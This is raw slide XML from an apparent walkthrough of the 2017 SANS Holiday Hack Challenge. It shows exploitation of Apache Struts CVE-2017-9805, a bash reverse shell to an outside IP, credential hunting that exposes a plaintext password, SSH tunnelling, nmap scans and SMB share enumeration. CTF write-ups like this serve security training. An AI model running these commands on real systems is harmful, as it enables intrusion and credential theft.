              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is the topic of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> page available in the web root of the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>On the Topic of Flying Animals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What is Alabaster Snowball's password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>stream_unhappy_buy_loss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0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2 - apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>STRuts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484" y="962309"/>
            <a:ext cx="5636070" cy="5798634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1500" dirty="0" smtClean="0"/>
              <a:t>1. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Source Code of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://l2s.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, found link to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://dev.northpolechristmastown.com/orders.xhtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>running apache struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/mazen160/struts-pwn_CVE-2017-9805</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>2. python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>struts-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>pwn.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>	'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://dev.northpolechristmastown.com/orders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>3. Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>from Hint </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>points to this tool to encode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/chrisjd20/cve-2017-9805.py/master/cve-2017-9805.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>downloaded python and used to send bash reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>/54.202.232.184/80 0&gt;&amp;1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>python cve-2017-9805.py -u  '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://dev.northpolechristmastown.com/orders/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>' -c  "bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>/54.202.232.184/80 0&gt;&amp;1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>got reverse shell on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>AWS instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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92379" y="887552"/>
            <a:ext cx="5799621" cy="6426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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>4. In Reverse shell went to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>/www/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>found GreatBookPage2.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://l2s.northpolechristmastown.com/GreatBookPage2.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/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en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>5. Pillage to find dev files with password , (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>becasue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> of hint)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> -l /*/*searched for files owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>alabaster_snowballfound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> a few interested files but one matched the 'dev' hint.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>shm:file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> in that directory called test1.txtcat test1.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>within that file a reference to a SQL file/opt/apache-tomcat/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class:3:            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>final String username = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>alabaster_snowball";cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> alabaster_snowball@l2s:/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>$ cat /opt/apache-tomcat/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>/ROOT/WEB-INF/classes/org/demo/rest/example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>OrderMySql.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>final String username = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>alabaster_snowball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>";            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>final String password = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>stream_unhappy_buy_loss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>";   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>alabaster_snowball@35.227.95.239</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>confirmed password with successful login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13856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85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2- apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>STRuts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25602" name="Picture 2" descr="ecure https://12s.northpolechristmastown.com &#10;DC Things to DO &#10;j Self &#10;Red Team &#10;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55" y="452292"/>
            <a:ext cx="5557520" cy="613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7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2 - apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>STRuts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26626" name="Picture 2" descr="ython struts-pwn.py --url 'https://dev.northpolechristmastown.com/orders' &#10;etc URL: https://dev.northpolechrist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1" r="1689" b="4388"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1740547" y="1137237"/>
            <a:ext cx="7683297" cy="145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ython cve-2017-9805.py &#10;https : //dev . northpolechris &#10;-u &#10;tmastown.com/orders/ •c &quot;bash -i &gt;&amp; /dev/tcp/54. &#10;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044" y="2712685"/>
            <a:ext cx="7306302" cy="16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ec2-user«a1i sudo nc -Ivp 8Ø &#10;listening on Cany] 8Ø &#10;connect to (172.31 . 24.128] from 211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7" y="4533580"/>
            <a:ext cx="7789367" cy="19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4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2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>STRuts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10" descr="at /opt/apache-tomcat/nebapps/R00T/AEB-INF/classes.org/demo/rest/example/0rderMySql . class &#10;&lt;-INF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40" y="2801837"/>
            <a:ext cx="9157130" cy="1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sh alabaster snowball@35.227.95.239 &#10;The authenticity of host '35.227.95.230 (35.227.95.239)' can't be establishe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471" y="4232288"/>
            <a:ext cx="6462887" cy="25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s &#10;Is &#10;css &#10;fonts &#10;GreatBookPage2. pdf &#10;ungs &#10;index . html &#10;process . ph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b="4413"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2594539" y="1096735"/>
            <a:ext cx="4941914" cy="160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Authorized to only attack external system Letters to Santa at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>l2s.northpolechristmastown.com</a:t>
            </a:r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Authorized to attack systems internal to 10.142.0.0/24 network that could be accessed through Letters to Santa system.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3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3 - SMB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1158240"/>
            <a:ext cx="10709729" cy="5266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3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Using your access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>Letters to Santa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> server, identify and enumerate the SMB file-sharing server. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is the file server share name?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>FileStor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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hints, please see Holly Evergreen in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Cryokinetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Magic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Level.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19389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557834" y="1172133"/>
            <a:ext cx="2536577" cy="51859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DMZ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3 - SMB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98903" y="836266"/>
            <a:ext cx="4080227" cy="55478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1" y="2856108"/>
            <a:ext cx="2247221" cy="1767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34" y="836266"/>
            <a:ext cx="740659" cy="740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6181" y="987467"/>
            <a:ext cx="25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Internal Elf Network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6605" y="4623241"/>
            <a:ext cx="170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Elf Attacker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3701" y="1887956"/>
            <a:ext cx="1038253" cy="811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57938" y="1887957"/>
            <a:ext cx="1038253" cy="811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SMB?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29085" y="4233715"/>
            <a:ext cx="1989056" cy="15177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Letters to Santa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH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29085" y="2097285"/>
            <a:ext cx="1989056" cy="15177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Dev.NorthPole.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15" title="HTTPS"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2685062" y="2997724"/>
            <a:ext cx="1010245" cy="612472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2" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2591697" y="4237583"/>
            <a:ext cx="1237388" cy="754990"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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27963" y="2856108"/>
            <a:ext cx="1629975" cy="2136464"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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557938" y="3106817"/>
            <a:ext cx="1038253" cy="811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153701" y="3106816"/>
            <a:ext cx="1038253" cy="811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25" name="Straight Arrow Connector 24" title="HTTPS"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2661999" y="3398871"/>
            <a:ext cx="1056369" cy="681605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1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3 - SMB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4143" y="1159498"/>
            <a:ext cx="1018094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342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>ec2 instance :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> -C -D 1080 alabaster_snowball@35.227.95.239</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> 10.142.0.0/24 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>sn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>didnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> reveal the SMB server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> 10.142.0.0/24  -PS445 (HINT from Holly Evergreen)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>revealed a new IP of 10.142.0.7 with 445 open </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>proxychains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smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> -L 10.142.0.7 -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>alabaster_snowball</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2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Enter WORKGROUP\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>alabaster_snowball's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> password: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>Sharename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>       Type      Comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2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---------       ----      -------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2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ADMIN$          Disk      Remote Admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2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C$              Disk      Default share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>FileStor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
